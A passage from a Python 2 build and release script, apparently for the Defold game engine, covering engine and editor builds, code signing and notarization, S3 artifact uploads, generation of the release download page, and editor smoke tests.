prefix = prefix and prefix or self.dynamo_home
return 'python %s/ext/bin/waf --prefix=%s %s %s %s distclean configure build install' % (self.dynamo_home, prefix, skip_tests, skip_codesign, disable_ccache)
def _build_engine_lib(self, args, lib, platform, skip_tests = False, dir = 'engine'):
self._log('Building %s for %s' % (lib, platform))
skip_build_tests = []
if skip_tests and '--skip-build-tests' not in self.waf_options:
skip_build_tests.append('--skip-tests')
skip_build_tests.append('--skip-build-tests')
cwd = join(self.defold_root, '%s/%s' % (dir, lib))
plf_args = ['--platform=%s' % platform]
run.env_command(self._form_env(), args + plf_args + self.waf_options + skip_build_tests, cwd = cwd)
def build_bob_light(self):
self._log('Building bob light')
cwd = join(self.defold_root, 'com.dynamo.cr/com.dynamo.cr.bob')
sha1 = self._git_sha1()
if os.path.exists(os.path.join(self.dynamo_home, 'archive', sha1)):
run.env_shell_command(self._form_env(), "./scripts/copy.sh", cwd = cwd)
env = self._form_env()
ant_args = ['-logger', 'org.apache.tools.ant.listener.AnsiColorLogger']
env['ANT_OPTS'] = '-Dant.logger.defaults=%s/ant-logger-colors.txt' % join(self.defold_root, 'com.dynamo.cr/com.dynamo.cr.bob.test')
run.command(" ".join([join(self.dynamo_home, 'ext/share/ant/bin/ant'), 'clean', 'install-bob-light'] + ant_args),
cwd = join(self.defold_root, 'com.dynamo.cr/com.dynamo.cr.bob'), shell = True, env = env)
def build_engine(self):
self.check_sdk()
# We want random folder to thoroughly test bob-light
# We dont' want it to unpack for _every_ single invocation during the build
os.environ['DM_BOB_ROOTFOLDER'] = tempfile.mkdtemp(prefix='bob-light-')
self._log("env DM_BOB_ROOTFOLDER=" + os.environ['DM_BOB_ROOTFOLDER'])
cmd = self._build_engine_cmd(**self._get_build_flags())
args = cmd.split()
host = self.host2
if 'x86-' in host:
host = self.host
if host == 'darwin':
host = 'x86_64-darwin'
# Make sure we build these for the host platform for the toolchain (bob light)
for lib in ['dlib', 'texc']:
skip_tests = host != self.target_platform
self._build_engine_lib(args, lib, host, skip_tests = skip_tests)
if not self.skip_bob_light:
# We must build bob-light, which builds content during the engine build
self.build_bob_light()
# Target libs to build
engine_libs = list(ENGINE_LIBS)
if host != self.target_platform:
engine_libs.insert(0, 'dlib')
if self.is_desktop_target():
engine_libs.insert(1, 'texc')
for lib in engine_libs:
if not build_private.is_library_supported(target_platform, lib):
continue
self._build_engine_lib(args, lib, target_platform)
self._build_engine_lib(args, 'extender', target_platform, dir = 'share')
if not self.skip_docs:
self.build_docs()
if not self.skip_builtins:
self.build_builtins()
if '--static-analyze' in self.waf_options:
scan_output_dir = os.path.normpath(os.path.join(os.environ['DYNAMO_HOME'], '..', '..', 'static_analyze'))
report_dir = os.path.normpath(os.path.join(os.environ['DYNAMO_HOME'], '..', '..', 'report'))
run.command(['python', './scripts/scan_build_gather_report.py', '-o', report_dir, '-i', scan_output_dir])
print("Wrote report to %s. Open with 'scan-view .' or 'python -m SimpleHTTPServer'" % report_dir)
shutil.rmtree(scan_output_dir)
if os.path.exists(os.environ['DM_BOB_ROOTFOLDER']):
print "Removing", os.environ['DM_BOB_ROOTFOLDER']
shutil.rmtree(os.environ['DM_BOB_ROOTFOLDER'])
def build_external(self):
flags = self._get_build_flags()
flags['prefix'] = join(self.defold_root, 'packages')
cmd = self._build_engine_cmd(**flags)
args = cmd.split() + ['package']
for lib in EXTERNAL_LIBS:
self._build_engine_lib(args, lib, platform=self.target_platform, dir='external')
def build_go(self):
exe_ext = '.exe' if 'win32' in self.target_platform else ''
go = '%s/ext/go/%s/go/bin/go%s' % (self.dynamo_home, self.target_platform, exe_ext)
if not os.path.exists(go):
self._log("Missing go for target platform, run install_ext with --platform set.")
exit(5)
run.env_command(self._form_env(), [go, 'clean', '-i', 'github.com/...'])
run.env_command(self._form_env(), [go, 'install', 'github.com/...'])
run.env_command(self._form_env(), [go, 'clean', '-i', 'defold/...'])
if not self.skip_tests:
run.env_command(self._form_env(), [go, 'test', 'defold/...'])
run.env_command(self._form_env(), [go, 'install', 'defold/...'])
for f in glob(join(self.defold, 'go', 'bin', '*')):
shutil.copy(f, join(self.dynamo_home, 'bin'))
def archive_go(self):
sha1 = self._git_sha1()
full_archive_path = join(sha1, 'go', self.target_platform)
for p in glob(join(self.defold, 'go', 'bin', '*')):
self.upload_to_archive(p, '%s/%s' % (full_archive_path, basename(p)))
def archive_bob(self):
sha1 = self._git_sha1()
full_archive_path = join(sha1, 'bob').replace('\\', '/')
for p in glob(join(self.dynamo_home, 'share', 'java', 'bob.jar')):
self.upload_to_archive(p, '%s/%s' % (full_archive_path, basename(p)))
def copy_local_bob_artefacts(self):
apkc_name = format_exes('apkc', self.host2)[0]
texc_name = format_lib('texc_shared', self.host2)
luajit_dir = tempfile.mkdtemp()
cwd = join(self.defold_root, 'com.dynamo.cr/com.dynamo.cr.bob')
missing = {}
def add_missing(plf, txt):
txts = []
txts = missing.setdefault(plf, txts)
txts = txts.append(txt)
for plf in [['x86_64-win32', 'x86_64-win32'], ['x86_64-linux', 'x86_64-linux'], ['x86_64-darwin', 'x86_64-darwin']]:
luajit_path = join(cwd, '../../packages/luajit-2.1.0-beta3-%s.tar.gz' % (plf[0]))
if not os.path.exists(luajit_path):
add_missing(plf[1], "package '%s' could not be found" % (luajit_path))
else:
self._extract(luajit_path, luajit_dir)
luajit_exe = format_exes('luajit-32', plf[1])[0]
luajit_exe_64 = format_exes('luajit-64', plf[1])[0]
self._copy(join(luajit_dir, 'bin/%s/%s' % (plf[0], luajit_exe)), join(cwd, 'libexec/%s/%s' % (plf[1], luajit_exe)))
self._copy(join(luajit_dir, 'bin/%s/%s' % (plf[0], luajit_exe_64)), join(cwd, 'libexec/%s/%s' % (plf[1], luajit_exe_64)))
win32_files = dict([['ext/lib/%s/%s.dll' % (plf[0], lib), 'lib/%s/%s.dll' % (plf[1], lib)] for lib in ['OpenAL32', 'wrap_oal', 'PVRTexLib', 'msvcr120'] for plf in [['win32', 'x86-win32'], ['x86_64-win32', 'x86_64-win32']]])
osx_files = dict([['ext/lib/%s/lib%s.dylib' % (plf[0], lib), 'lib/%s/lib%s.dylib' % (plf[1], lib)] for lib in ['PVRTexLib'] for plf in [['x86_64-darwin', 'x86_64-darwin']]])
linux_files = dict([['ext/lib/%s/lib%s.so' % (plf[0], lib), 'lib/%s/lib%s.so' % (plf[1], lib)] for lib in ['PVRTexLib'] for plf in [['x86_64-linux', 'x86_64-linux']]])
js_files = {}
android_files = {'ext/bin/%s/%s' % (self.host2, apkc_name): 'libexec/%s/%s' % (self.host2, apkc_name),
'share/java/classes.dex': 'lib/classes.dex',
'ext/share/java/android.jar': 'lib/android.jar'}
switch_files = {}
# This dict is being built up and will eventually be used for copying in the end
# - "type" - what the files are needed for, for error reporting
# - pairs of src-file -> dst-file
artefacts = {'generic': {'share/java/dlib.jar': 'lib/dlib.jar',
'share/builtins.zip': 'lib/builtins.zip',
'lib/%s/%s' % (self.host2, texc_name): 'lib/%s/%s' % (self.host2, texc_name)},
'android-bundling': android_files,
'win32-bundling': win32_files,
'js-bundling': js_files,
'ios-bundling': {},
'osx-bundling': osx_files,
'linux-bundling': linux_files,
'switch-bundling': switch_files}
# Add dmengine to 'artefacts' procedurally
for type, plfs in {'android-bundling': [['armv7-android', 'armv7-android'], ['arm64-android', 'arm64-android']],
'win32-bundling': [['win32', 'x86-win32'], ['x86_64-win32', 'x86_64-win32']],
'js-bundling': [['js-web', 'js-web'], ['wasm-web', 'wasm-web']],
'ios-bundling': [['armv7-darwin', 'armv7-darwin'], ['arm64-darwin', 'arm64-darwin'], ['x86_64-ios', 'x86_64-ios']],
'osx-bundling': [['x86_64-darwin', 'x86_64-darwin']],
'linux-bundling': [['x86_64-linux', 'x86_64-linux']],
'switch-bundling': [['arm64-nx64', 'arm64-nx64']]}.iteritems():
# plfs is pairs of src-platform -> dst-platform
for plf in plfs:
exes = format_exes('dmengine', plf[1]) + format_exes('dmengine_release', plf[1])
artefacts[type].update(dict([['bin/%s/%s' % (plf[0], exe), 'libexec/%s/%s' % (plf[1], exe)] for exe in exes]))
# Perform the actual copy, or list which files are missing
for type, files in artefacts.iteritems():
m = []
for src, dst in files.iteritems():
src_path = join(self.dynamo_home, src)
if not os.path.exists(src_path):
m.append(src_path)
else:
dst_path = join(cwd, dst)
self._mkdirs(os.path.dirname(dst_path))
self._copy(src_path, dst_path)
if m:
add_missing(type, m)
if missing:
print('*** NOTE! There are missing artefacts.')
print(json.dumps(missing, indent=2))
def build_bob(self):
cwd = join(self.defold_root, 'com.dynamo.cr/com.dynamo.cr.bob')
sha1 = self._git_sha1()
if os.path.exists(os.path.join(self.dynamo_home, 'archive', sha1)):
run.env_shell_command(self._form_env(), "./scripts/copy.sh", cwd = cwd)
else:
self.copy_local_bob_artefacts()
env = self._form_env()
ant = join(self.dynamo_home, 'ext/share/ant/bin/ant')
ant_args = ['-logger', 'org.apache.tools.ant.listener.AnsiColorLogger']
env['ANT_OPTS'] = '-Dant.logger.defaults=%s/ant-logger-colors.txt' % join(self.defold_root, 'com.dynamo.cr/com.dynamo.cr.bob.test')
cwd = join(self.defold_root, 'com.dynamo.cr/com.dynamo.cr.bob')
args = [ant, 'clean', 'install'] + ant_args
run.command(" ".join(args), cwd = cwd, shell = True, env = env, stdout = None)
if not self.skip_tests:
cwd = join(self.defold_root, 'com.dynamo.cr/com.dynamo.cr.bob.test')
args = [ant, 'test-clean', 'test'] + ant_args
run.command(" ".join(args), cwd = cwd, shell = True, env = env, stdout = None)
def build_sdk(self):
tempdir = tempfile.mkdtemp() # where the sdk ends up
sha1 = self._git_sha1()
u = urlparse.urlparse(self.get_archive_path())
bucket = s3.get_bucket(u.netloc)
root = urlparse.urlparse(self.get_archive_path()).path[1:]
base_prefix = os.path.join(root, sha1)
platforms = get_target_platforms()
for platform in platforms:
prefix = os.path.join(base_prefix, 'engine', platform, 'defoldsdk.zip')
entry = bucket.get_key(prefix)
if entry is None:
raise Exception("Could not find sdk: %s" % prefix)
platform_sdk_zip = tempfile.NamedTemporaryFile(delete = False)
print "Downloading", entry.key
entry.get_contents_to_filename(platform_sdk_zip.name)
print "Downloaded", entry.key, "to", platform_sdk_zip.name
self._extract_zip(platform_sdk_zip.name, tempdir)
print "Extracted", platform_sdk_zip.name, "to", tempdir
os.unlink(platform_sdk_zip.name)
print ""
treepath = os.path.join(tempdir, 'defoldsdk')
sdkpath = self._ziptree(treepath, directory=tempdir)
print "Packaged defold sdk"
sdkurl = join(sha1, 'engine').replace('\\', '/')
self.upload_to_archive(sdkpath, '%s/defoldsdk.zip' % sdkurl)
def build_docs(self):
skip_tests = '--skip-tests' if self.skip_tests or self.target_platform != self.host else ''
self._log('Building API docs')
cwd = join(self.defold_root, 'engine/docs')
cmd = 'python %s/ext/bin/waf configure --prefix=%s %s distclean configure build install' % (self.dynamo_home, self.dynamo_home, skip_tests)
run.env_command(self._form_env(), cmd.split() + self.waf_options, cwd = cwd)
with open(join(self.dynamo_home, 'share', 'ref-doc.zip'), 'wb') as f:
self._ziptree(join(self.dynamo_home, 'share', 'doc'), outfile = f, directory = join(self.dynamo_home, 'share'))
# ------------------------------------------------------------
# BEGIN: EDITOR 2
#
def download_editor2(self):
editor_filename = "Defold-%s.zip" % self.target_platform
editor_path = join(self.defold_root, 'editor', 'target', 'editor', editor_filename)
s3_path = join(self._git_sha1(), self.channel, 'editor2', editor_filename)
self.download_from_archive(s3_path, editor_path)
def archive_editor2(self):
sha1 = self._git_sha1()
full_archive_path = join(sha1, self.channel, 'editor2')
zip_file = "Defold-%s.zip" % self.target_platform
dmg_file = "Defold-%s.dmg" % self.target_platform
zip_path = join(self.defold_root, 'editor', 'target', 'editor', zip_file)
dmg_path = join(self.defold_root, 'editor', 'target', 'editor', dmg_file)
if os.path.exists(zip_path): self.upload_to_archive(zip_path, '%s/%s' % (full_archive_path, zip_file))
if os.path.exists(dmg_path): self.upload_to_archive(dmg_path, '%s/%s' % (full_archive_path, dmg_file))
self.wait_uploads()
def run_editor_script(self, cmd):
cwd = join(self.defold_root, 'editor')
run.env_command(self._form_env(), cmd, cwd = cwd)
def build_editor2(self):
cmd = ['./scripts/bundle.py',
'--engine-artifacts=%s' % self.engine_artifacts,
'build']
if self.skip_tests:
cmd.append("--skip-tests")
self.run_editor_script(cmd)
def bundle_editor2(self):
cmd = ['./scripts/bundle.py',
'--platform=%s' % self.target_platform,
'--version=%s' % self.version,
'--channel=%s' % self.channel,
'--engine-artifacts=%s' % self.engine_artifacts,
'bundle']
self.run_editor_script(cmd)
def sign_editor2(self):
editor_bundle_dir = join(self.defold_root, 'editor', 'target', 'editor')
cmd = ['./scripts/bundle.py',
'--platform=%s' % self.target_platform,
'--bundle-dir=%s' % editor_bundle_dir,
'sign']
if self.skip_codesign:
cmd.append('--skip-codesign')
else:
if self.windows_cert:
cmd.append('--windows-cert="%s"' % self.windows_cert)
if self.windows_cert_pass:
cmd.append('--windows-cert-pass="%s"' % self.windows_cert_pass)
if self.codesigning_identity:
cmd.append('--codesigning-identity="%s"' % self.codesigning_identity)
self.run_editor_script(cmd)
def notarize_editor2(self):
if self.target_platform != "x86_64-darwin":
return
editor_bundle_dir = join(self.defold_root, 'editor', 'target', 'editor')
# create dmg installer
cmd = ['./scripts/bundle.py',
'--platform=x86_64-darwin',
'--bundle-dir=%s' % editor_bundle_dir,
'installer']
if self.skip_codesign:
cmd.append('--skip-codesign')
else:
if self.codesigning_identity:
cmd.append('--codesigning-identity="%s"' % self.codesigning_identity)
self.run_editor_script(cmd)
# notarize dmg
editor_dmg = join(editor_bundle_dir, 'Defold-x86_64-darwin.dmg')
cmd = ['./scripts/notarize.py',
editor_dmg,
self.notarization_username,
self.notarization_password,
self.notarization_itc_provider]
self.run_editor_script(cmd)
#
# END: EDITOR 2
# ------------------------------------------------------------
def bump(self):
sha1 = self._git_sha1()
with open('VERSION', 'r') as f:
current = f.readlines()[0].strip()
if self.set_version:
new_version = self.set_version
else:
lst = map(int, current.split('.'))
lst[-1] += 1
new_version = '.'.join(map(str, lst))
with open('VERSION', 'w') as f:
f.write(new_version)
print 'Bumping engine version from %s to %s' % (current, new_version)
print 'Review changes and commit'
def save_env(self):
if not self.save_env_path:
self._log("No --save-env-path set when trying to save environment export")
return
env = self._form_env()
res = ""
for key in env:
if bool(re.match('^[a-zA-Z0-9_]+$', key)):
res = res + ("export %s='%s'\n" % (key, env[key]))
with open(self.save_env_path, "w") as f:
f.write(res)
def shell(self):
print 'Setting up shell with DYNAMO_HOME, PATH, ANDROID_HOME and LD_LIBRARY_PATH/DYLD_LIBRARY_PATH (where applicable) set'
if "win32" in self.host:
preexec_fn = None
else:
preexec_fn = self.check_ems
process = subprocess.Popen([SHELL, '-l'], env = self._form_env(), preexec_fn=preexec_fn)
output = process.communicate()[0]
if process.returncode != 0:
self._log(output)
sys.exit(process.returncode)
# ------------------------------------------------------------
# BEGIN: RELEASE
#
def release(self):
page = """
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>Defold Downloads</title>
<link href='//fonts.googleapis.com/css?family=Open+Sans:400,300' rel='stylesheet' type='text/css'>
<link rel="stylesheet" href="//d.defold.com/static/bootstrap/css/bootstrap.min.css">
<style>
body {
padding-top: 50px;
}
.starter-template {
padding: 40px 15px;
text-align: center;
}
</style>
</head>
<body>
<div class="navbar navbar-fixed-top">
<div class="navbar-inner">
<div class="container">
<a class="brand" href="/">Defold Downloads</a>
<ul class="nav">
</ul>
</div>
</div>
</div>
<div class="container">
<div id="releases"></div>
<script src="//ajax.googleapis.com/ajax/libs/jquery/1.11.0/jquery.min.js"></script>
<script src="//d.defold.com/static/bootstrap/js/bootstrap.min.js"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/mustache.js/0.7.2/mustache.min.js"></script>
<script id="templ-releases" type="text/html">
<h2>{{release.channel}} {{release.version}}</h2>
{{#release.editor}}
<p>
<a href="{{url}}" class="btn btn-primary" style="width: 20em;" role="button">Download for {{name}}</a>
</p>
{{/release.editor}}
{{#has_releases}}
<h2>Releases</h2>
{{/has_releases}}
{{#releases}}
<div class="panel-group" id="accordion">
<div class="panel panel-default">
<div class="panel-heading">
<h4 class="panel-title">
<a data-toggle="collapse" data-parent="#accordion" href="#{{sha1}}">
<h3>{{tag}} <small>{{date}} ({{abbrevsha1}})</small></h3>
</a>
</h4>
</div>
<div id="{{sha1}}" class="panel-collapse collapse ">
<div class="panel-body">
<table class="table table-striped">
<tbody>
{{#files}}
<tr><td><a href="{{path}}">{{name}}</a></td></tr>
{{/files}}
{{^files}}
<i>No files</i>
{{/files}}
</tbody>
</table>
</div>
</div>
</div>
</div>
{{/releases}}
</script>
<script>
var model = %(model)s
var output = Mustache.render($('#templ-releases').html(), model);
$("#releases").html(output);
</script>
</body>
</html>
"""
if run.shell_command('git config -l').find('remote.origin.url') != -1 and os.environ.get('GITHUB_WORKFLOW', None) is None:
# NOTE: Only run fetch when we have a configured remote branch.
# When running on buildbot we don't but fetching should not be required either
# as we're already up-to-date
self._log('Running git fetch to get latest tags and refs...')
run.shell_command('git fetch')
u = urlparse.urlparse(self.get_archive_path())
hostname = u.hostname
bucket = s3.get_bucket(hostname)
model = {'releases': [],
'has_releases': False}
if self.channel == 'stable':
# Move artifacts to a separate page?
model['releases'] = s3.get_tagged_releases(self.get_archive_path())
model['has_releases'] = True
else:
model['releases'] = s3.get_single_release(self.get_archive_path(), self.version, self._git_sha1())
model['has_releases'] = True
if not model['releases']:
raise Exception('Unable to find any releases')
# NOTE
# - The stable channel is based on the latest tag
# - The beta and alpha channels are based on the latest
# commit in their branches, i.e. origin/dev for alpha
if self.channel == 'stable':
release_sha1 = model['releases'][0]['sha1']
else:
release_sha1 = self._git_sha1()
if sys.stdin.isatty():
sys.stdout.write('Release %s with SHA1 %s to channel %s? [y/n]: ' % (self.version, release_sha1, self.channel))
response = sys.stdin.readline()
if response[0] != 'y':
return
model['release'] = { 'channel': "Unknown", 'version': self.version }
if self.channel:
model['release']['channel'] = self.channel.capitalize()
# We handle the stable channel seperately, since we want it to point
# to the editor-dev release (which uses the latest stable engine).
editor_channel = None
if self.channel == "stable":
editor_channel = "editor-alpha"
else:
editor_channel = self.channel or "stable"
editor_archive_path = urlparse.urlparse(self.get_archive_path(editor_channel)).path
editor_download_url = "https://%s%s/%s/%s/editor2/" % (hostname, editor_archive_path, release_sha1, editor_channel)
model['release'] = {'editor': [ dict(name='macOS 10.11+', url=editor_download_url + 'Defold-x86_64-darwin.dmg'),
dict(name='macOS 10.7-10.10', url=editor_download_url + 'Defold-x86_64-darwin.zip'),
dict(name='Windows', url=editor_download_url + 'Defold-x86_64-win32.zip'),
dict(name='Ubuntu 16.04+', url=editor_download_url + 'Defold-x86_64-linux.zip')] }
# NOTE: We upload index.html to /CHANNEL/index.html
# The root-index, /index.html, redirects to /stable/index.html
self._log('Uploading %s/index.html' % self.channel)
html = page % {'model': json.dumps(model)}
key = bucket.new_key('%s/index.html' % self.channel)
key.content_type = 'text/html'
key.set_contents_from_string(html)
self._log('Uploading %s/info.json' % self.channel)
key = bucket.new_key('%s/info.json' % self.channel)
key.content_type = 'application/json'
key.set_contents_from_string(json.dumps({'version': self.version,
'sha1' : release_sha1}))
# Editor update-v3.json
key_v3 = bucket.new_key('editor2/channels/%s/update-v3.json' % self.channel)
key_v3.content_type = 'application/json'
self._log("Updating channel '%s' for update-v3.json: %s" % (self.channel, key_v3))
key_v3.set_contents_from_string(json.dumps({'sha1': release_sha1}))
# Set redirect urls so the editor can always be downloaded without knowing the latest sha1.
# Used by www.defold.com/download
# For example;
# redirect: /editor2/channels/editor-alpha/Defold-x86_64-darwin.dmg -> /archive/<sha1>/editor-alpha/Defold-x86_64-darwin.dmg
for name in ['Defold-x86_64-darwin.dmg', 'Defold-x86_64-win32.zip', 'Defold-x86_64-linux.zip']:
key_name = 'editor2/channels/%s/%s' % (editor_channel, name)
redirect = '%s/%s/%s/editor2/%s' % (editor_archive_path, release_sha1, editor_channel, name)
self._log('Creating link from %s -> %s' % (key_name, redirect))
key = bucket.new_key(key_name)
key.set_redirect(redirect)
#
# END: RELEASE
# ------------------------------------------------------------
def release_to_github(self):
release_to_github.release(self)
def release_to_github_markdown(self):
release_to_github.release_markdown(self)
def sync_archive(self):
u = urlparse.urlparse(self.get_archive_path())
bucket_name = u.hostname
bucket = s3.get_bucket(bucket_name)
local_dir = os.path.join(self.dynamo_home, 'archive')
self._mkdirs(local_dir)
if not self.thread_pool:
self.thread_pool = ThreadPool(8)
def download(key, path):
self._log('s3://%s/%s -> %s' % (bucket_name, key.name, path))
key.get_contents_to_filename(path)
futures = []
sha1 = self._git_sha1()
# Only s3 is supported (scp is deprecated)
# The pattern is used to filter out:
# * Editor files
# * Defold SDK files
# * launcher files, used to launch editor2
pattern = re.compile(r'(^|/)editor(2)*/|/defoldsdk\.zip$|/launcher(\.exe)*$')
prefix = s3.get_archive_prefix(self.get_archive_path(), self._git_sha1())
for key in bucket.list(prefix = prefix):
rel = os.path.relpath(key.name, prefix)
if not pattern.search(rel):
p = os.path.join(local_dir, sha1, rel)
self._mkdirs(os.path.dirname(p))
f = Future(self.thread_pool, download, key, p)
futures.append(f)
for f in futures:
f()
# ------------------------------------------------------------
# BEGIN: SMOKE TEST
#
def _download_editor2(self, channel, sha1):
bundles = {
'x86_64-darwin': 'Defold-x86_64-darwin.dmg',
'x86_64-linux' : 'Defold-x86_64-linux.zip',
'x86_64-win32' : 'Defold-x86_64-win32.zip'
}
host2 = get_host_platform2()
bundle = bundles.get(host2)
if bundle:
url = join(self.get_archive_path(), sha1, channel, 'editor2', bundle).replace("s3", "https").replace("\\", "/")
path = self._download(url)
return path
else:
print("No editor2 bundle found for %s" % host2)
return None
def _install_editor2(self, path):
host2 = get_host_platform2()
install_path = join('tmp', 'smoke_test')
if 'darwin' in host2:
out = run.command(['hdiutil', 'attach', path])
print("cmd:" + out)
last = [l2 for l2 in (l1.strip() for l1 in out.split('\n')) if l2][-1]
words = last.split()
fs = words[0]
volume = words[-1]
install_path = join(install_path, 'Defold.app')
self._copy_tree(join(volume, 'Defold.app'), install_path)
result = {'volume': volume,
'fs': fs,
'install_path': install_path,
'resources_path': join('Defold.app', 'Contents', 'Resources'),
'config': join(install_path, 'Contents', 'Resources', 'config')}
return result
else:
if 'win32' in host2 or 'linux' in host2:
self._extract_zip(path, install_path)
else:
self._extract(path, install_path)
install_path = join(install_path, 'Defold')
result = {'install_path': install_path,
'resources_path': 'Defold',
'config': join(install_path, 'config')}
return result
def _uninstall_editor2(self, info):
host2 = get_host_platform2()
shutil.rmtree(info['install_path'])
if 'darwin' in host2:
out = run.command(['hdiutil', 'detach', info['fs']])
def _get_config(self, config, section, option, overrides):
combined = '%s.%s' % (section, option)
if combined in overrides:
return overrides[combined]
if section == 'bootstrap' and option == 'resourcespath':
return '.'
v = config.get(section, option)
m = re.search(r"\${(\w+).(\w+)}", v)
while m:
s = m.group(1)
o = m.group(2)
v = re.sub(r"\${(\w+).(\w+)}", self._get_config(config, s, o, overrides), v, 1)
m = re.search(r"\${(\w+).(\w+)}", v)
return v
def smoke_test(self):
sha1 = self._git_sha1()
cwd = join('tmp', 'smoke_test')
if os.path.exists(cwd):
shutil.rmtree(cwd)
path = self._download_editor2(self.channel, sha1)
info = self._install_editor2(path)
config = ConfigParser()
config.read(info['config'])
overrides = {'bootstrap.resourcespath': info['resources_path']}
jdk = 'jdk11.0.1-p1'
host2 = get_host_platform2()
if 'win32' in host2:
java = join('Defold', 'packages', jdk, 'bin', 'java.exe')
elif 'linux' in host2:
run.command(['chmod', '-R', '755', 'tmp/smoke_test/Defold'])
java = join('Defold', 'packages', jdk, 'bin', 'java')
else:
java = join('Defold.app', 'Contents', 'Resources', 'packages', jdk, 'bin', 'java')
jar = self._get_config(config, 'launcher', 'jar', overrides)
vmargs = self._get_config(config, 'launcher', 'vmargs', overrides).split(',') + ['-Ddefold.log.dir=.', '-Ddefold.smoke.log=true']
vmargs = filter(lambda x: not str.startswith(x, '-Ddefold.update.url='), vmargs)
main = self._get_config(config, 'launcher', 'main', overrides)
game_project = '../../editor/test/resources/geometry_wars/game.project'
args = [java, '-cp', jar] + vmargs + [main, '--preferences=../../editor/test/resources/smoke_test_prefs.json', game_project]
robot_jar = '%s/ext/share/java/defold-robot.jar' % self.dynamo_home
robot_args = [java, '-jar', robot_jar, '-s', '../../share/smoke-test.edn', '-o', 'result']
origdir = os.getcwd()
origcwd = cwd
if 'win32' in host2:
os.chdir(cwd)
cwd = '.'
print('Running robot: %s' % robot_args)
robot_proc = subprocess.Popen(robot_args, cwd = cwd, stdout = subprocess.PIPE, stderr = subprocess.PIPE, shell = False)
time.sleep(2)
self._log('Running editor: %s' % args)
ed_proc = subprocess.Popen(args, cwd = cwd, shell = False)
os.chdir(origdir)
cwd = origcwd
output = robot_proc.communicate()[0]
if ed_proc.poll() == None:
ed_proc.terminate()
ed_proc.wait()
self._uninstall_editor2(info)
result_archive_path = '/'.join(['int.d.defold.com', 'archive', sha1, self.channel, 'editor2', 'smoke_test'])
def _findwebfiles(libdir):
paths = os.listdir(libdir)
paths = [os.path.join(libdir, x) for x in paths if os.path.splitext(x)[1] in ('.html', '.css', '.png')]
return paths
for f in _findwebfiles(join(cwd, 'result')):
self.upload_to_s3(f, 's3://%s/%s' % (result_archive_path, basename(f)))
self.wait_uploads()
self._log('Log: https://s3-eu-west-1.amazonaws.com/%s/index.html' % (result_archive_path))
if robot_proc.returncode != 0:
sys.exit(robot_proc.returncode)
return True
def local_smoke(self):
host2 = get_host_platform2()
cwd = './editor'
if os.path.exists('editor/log.txt'):
os.remove('editor/log.txt')
game_project = 'test/resources/geometry_wars/game.project'
args = ['./scripts/lein', 'with-profile', '+smoke-test', 'run', game_project]
robot_jar = '../defold-robot/target/defold-robot-0.7.0-standalone.jar'
robot_args = ['java', '-jar', robot_jar, '-s', '../share/smoke-test.edn', '-o', 'local_smoke_result']
origdir = os.getcwd()
origcwd = cwd
if 'win32' in host2:
os.chdir(cwd)
args = ['sh'] + args
cwd = '.'
print('Running robot: %s' % robot_args)
robot_proc = subprocess.Popen(robot_args, cwd = cwd, stdout = subprocess.PIPE, stderr = subprocess.PIPE, shell = False)
time.sleep(2)
self._log('Running editor: %s' % args)
ed_proc = subprocess.Popen(args, cwd = cwd, shell = False)
os.chdir(origdir)
cwd = origcwd
output = robot_proc.communicate()[0]
if ed_proc.poll() == None:
ed_proc.terminate()
ed_proc.wait()
if robot_proc.returncode != 0:
sys.exit(robot_proc.returncode)
return True
#
# END: SMOKE TEST
# ------------------------------------------------------------
def get_archive_path(self, channel=None):
return join(self.archive_path, channel or self.channel)
def get_archive_redirect_key(self, url):
old_url = url.replace(self.get_archive_path().replace("\\", "/"), self.archive_path)
u = urlparse.urlparse(old_url)
return u.path
def download_from_archive(self, src_path, dst_file):
url = join(self.get_archive_path(), src_path)
self.download_from_s3(dst_file, url)
def upload_to_archive(self, src_file, dst_path):
url = join(self.get_archive_path(), dst_path).replace("\\", "/")
self._log("Uploading %s -> %s" % (src_file, url))
self.upload_to_s3(src_file, url)
# create redirect so that the old s3 paths still work
# s3://d.defold.com/archive/channel/sha1/engine/* -> http://d.defold.com/archive/sha1/engine/*
bucket = s3.get_bucket(urlparse.urlparse(url).netloc)
redirect_key = self.get_archive_redirect_key(url)
redirect_url = url.replace("s3://", "http://")
key = bucket.new_key(redirect_key)
key.set_redirect(redirect_url)
self._log("Redirecting %s -> %s : %s" % (url, redirect_key, redirect_url))
def download_from_s3(self, path, url):
url = url.replace('\\', '/')
self._log('Downloading %s -> %s' % (url, path))
u = urlparse.urlparse(url)
if u.scheme == 's3':
self._mkdirs(os.path.dirname(path))
from boto.s3.key import Key
bucket = s3.get_bucket(u.netloc)
k = Key(bucket)
k.key = u.path
k.get_contents_to_filename(path)
self._log('Downloaded %s -> %s' % (url, path))
else:
raise Exception('Unsupported url %s' % (url))
def upload_to_s3(self, path, url):
url = url.replace('\\', '/')
self._log('Uploading %s -> %s' % (path, url))
u = urlparse.urlparse(url)
if u.scheme == 's3':
bucket = s3.get_bucket(u.netloc)
if not self.thread_pool:
self.thread_pool = ThreadPool(8)
p = u.path
if p[-1] == '/':
p += basename(path)
def upload_singlefile():
key = bucket.new_key(p)
key.set_contents_from_filename(path)
self._log('Uploaded %s -> %s' % (path, url))
def upload_multipart():
headers = {}
contenttype, _ = mimetypes.guess_type(path)
if contenttype is not None:
headers['Content-Type'] = contenttype
mp = bucket.initiate_multipart_upload(p, headers=headers)
source_size = os.stat(path).st_size
chunksize = 64 * 1024 * 1024 # 64 MiB
chunkcount = int(math.ceil(source_size / float(chunksize)))
def upload_part(filepath, part, offset, size):
with open(filepath, 'r') as fhandle:
fhandle.seek(offset)
mp.upload_part_from_file(fp=fhandle, part_num=part, size=size)
_threads = []
for i in range(chunkcount):
part = i + 1
offset = i * chunksize
remaining = source_size - offset
size = min(chunksize, remaining)
args = {'filepath': path, 'part': part, 'offset': offset, 'size': size}
self._log('Uploading #%d %s -> %s' % (i + 1, path, url))
_thread = Thread(target=upload_part, kwargs=args)
_threads.append(_thread)
_thread.start()
for i in range(chunkcount):
_threads[i].join()
self._log('Uploaded #%d %s -> %s' % (i + 1, path, url))
if len(mp.get_all_parts()) == chunkcount:
mp.complete_upload()
self._log('Uploaded %s -> %s' % (path, url))
else:
mp.cancel_upload()
self._log('Failed to upload %s -> %s' % (path, url))
f = None
if sys.platform == 'win32':
f = Future(self.thread_pool, upload_singlefile)
else:
f = Future(self.thread_pool, upload_multipart)
self.futures.append(f)
else:
